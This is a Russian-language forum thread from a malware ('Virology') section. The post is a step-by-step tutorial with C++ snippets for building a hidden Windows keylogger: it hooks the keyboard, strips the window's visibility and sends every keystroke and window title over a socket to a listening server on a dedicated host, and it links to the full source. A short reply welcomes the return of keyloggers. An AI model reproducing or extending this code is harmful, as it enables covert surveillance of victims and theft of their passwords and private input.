Загрузка...

Keylogger с отправкой на сервер

Тема в разделе Вирусология создана пользователем E_r_A 21 мар 2018. (поднята 21 мар 2018) 1161 просмотр

Загрузка...
  1. E_r_A
    E_r_A Автор темы 21 мар 2018 Заблокирован(а) 52 2 фев 2018
    В этой статье я хочу показать, насколько просто написать самому кейлоггер с базовым функционалом. Базу я позаимствовал отсюда - https://simple-keylogger.github.io, пофиксил баги и доработал под взаимодействие с WinSocket.
    Материалы
    Visual Studio 2015 Community Update 4
    Visual C++ 2015
    Структура приложения
    Для начала необходимо определить, как вообще будет работать кейлоггер. Будь то отсылка ***** на FTP/Почту, запись нажатий в сокет, отправка файла на гейт, запись ***** в бд.
    Я решил остановится на сокетах. Почему? Это удобно, просто и юзабельно.
    Исходя из выбора, нам нужно будет сделать 2 приложения:
    Сервер
    Консольное приложение, которое будет принимать данные от клиента и выдавать в консоли
    Клиент
    Собственно, сам кейлоггер, который будет отсылать нажатия клавиш на сервер
    И начнем мы, пожалуй, с сервера.
    Сервер
    Создаем консольное C++ приложение в Visual Studio.
    Весь код есть в оф. примере MSDN - https://msdn.microsoft.com/en-us/library/ms737593(VS.85).aspx
    Нам лишь нужно заменить некоторые значения в нем...
    Сразу пропишем константные переменные: величину буффера и порт сервера, на который будут приходить ****

    Код
    [URL='https://vk.com/feed?section=search&q=%23define']#define[/URL] DEFAULT_BUFLEN 1024 //Буффер
    [URL='https://vk.com/feed?section=search&q=%23define']#define[/URL] DEFAULT_PORT "1337" //Порт

    Вместо единоразового do/while ставим бесконечный цикл, в котором будем принимать данные от клиента, выводить их в консоль, закрывать соединение и по новой:
    Код
    do {
    ClientSocket = accept(ListenSocket, NULL, NULL); //Принимаем коннект
    iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);//Считываем лог
    if (iResult > 0) //Если лог не пустой
    printf("%s", recvbuf); //Выводим
    closesocket(ClientSocket);//Закрываем соединение
    memset(recvbuf, 0, sizeof recvbuf);//Освобождаем память
    }
    while (true);

    Компилируем в Release, закидываем на дедик, открываем нужный нам порт и запускаем
    Клиент
    Создаем приложение Win32 в Visual Studio.
    Как я уже и говорил выше, хук клавиатуры и обработчик нажатий я взял с https://github.com/GiacomoLaw/Keylogger/blob/master/w..
    Чтоб прикрутить отправку нажатия на сокет я обратился к https://msdn.microsoft.com/en-us/library/ms737591(VS.85).aspx
    Так же, сразу определяем константные переменные: длину буффера, айпи дедика/компа и порт
    код:
    Код
    [URL='https://vk.com/feed?section=search&q=%23define']#define[/URL] DEFAULT_BUFLEN 20000
    [URL='https://vk.com/feed?section=search&q=%23define']#define[/URL] SERVER_IP "127.0.0.1"
    [URL='https://vk.com/feed?section=search&q=%23define']#define[/URL] SERVER_PORT "1337"

    Некоторые переменные пришлось вытащить из их методов и сделать глобальными, чтобы код начал работать корректно:
    Код
    WSADATA wsaData;
    SOCKET ConnectSocket = INVALID_SOCKET;
    HHOOK _hook;KBDLLHOOKSTRUCT kbdStruct;
    char lastwindow[256];
    int Save(int key_stroke);// Убрал второй аргумент

    Создаем метод отправки данных на сервер по примеру, который был в начале абзаца. Далее, везде заменяем порт, айпи и передаваемую инфу на аргументы функции:
    Код
    void sendData(char [URL='https://vk.com/ip']*ip[/URL], char * port, char*data)
    В методе Save делаем следующее - убираем второй аргумент и меняем запись ***** в файл на отправку к серверу:
    Код
    char data[DEFAULT_BUFLEN];
    sprintf(data, "\n\n[Window: %s - at %s]\n", window_title, s); sendData(SERVER_IP, SERVER_PORT, data);
    Далее, по такому же принципу, меняем отправку в нажатиях служебных клавиш. Отправку букв можно сделать таким образом:

    Код
    char c[512];
    sprintf(c, "%c", key_stroke);
    sendData(SERVER_IP, SERVER_PORT, c);

    Вырезаем все что связано с видимостью окна из кода, и, готово.
    Итог:
    При запуске кейлоггера, он повиснет в процессах и будет обрабатывать каждое нажатие на клавиатуре. Возможно, некоторые символы будут отображаться некорректно, например, слеши, но все это можно исправить самому
    Ссылки:
    Кейлоггер, взятый за основу - https://simple-keylogger.github.io
    Сокет-сервер - https://msdn.microsoft.com/en-us/library/ms737593(VS.85).aspx
    Сокет-клиент - https://msdn.microsoft.com/en-us/library/ms737591(VS.85).aspx
    Готовые исходники проекта - https://github.com/ims0rry/Socket-keylogger
    копипаст
     
  2. Енот272_inactive171964
    Енот272_inactive171964 9 апр 2018 Ушел на покой 372 6 сен 2017
    Ну норм, спасибо что показал тему с кейлогерами на шарпах, скоро они снова войдут в моду.
     
Top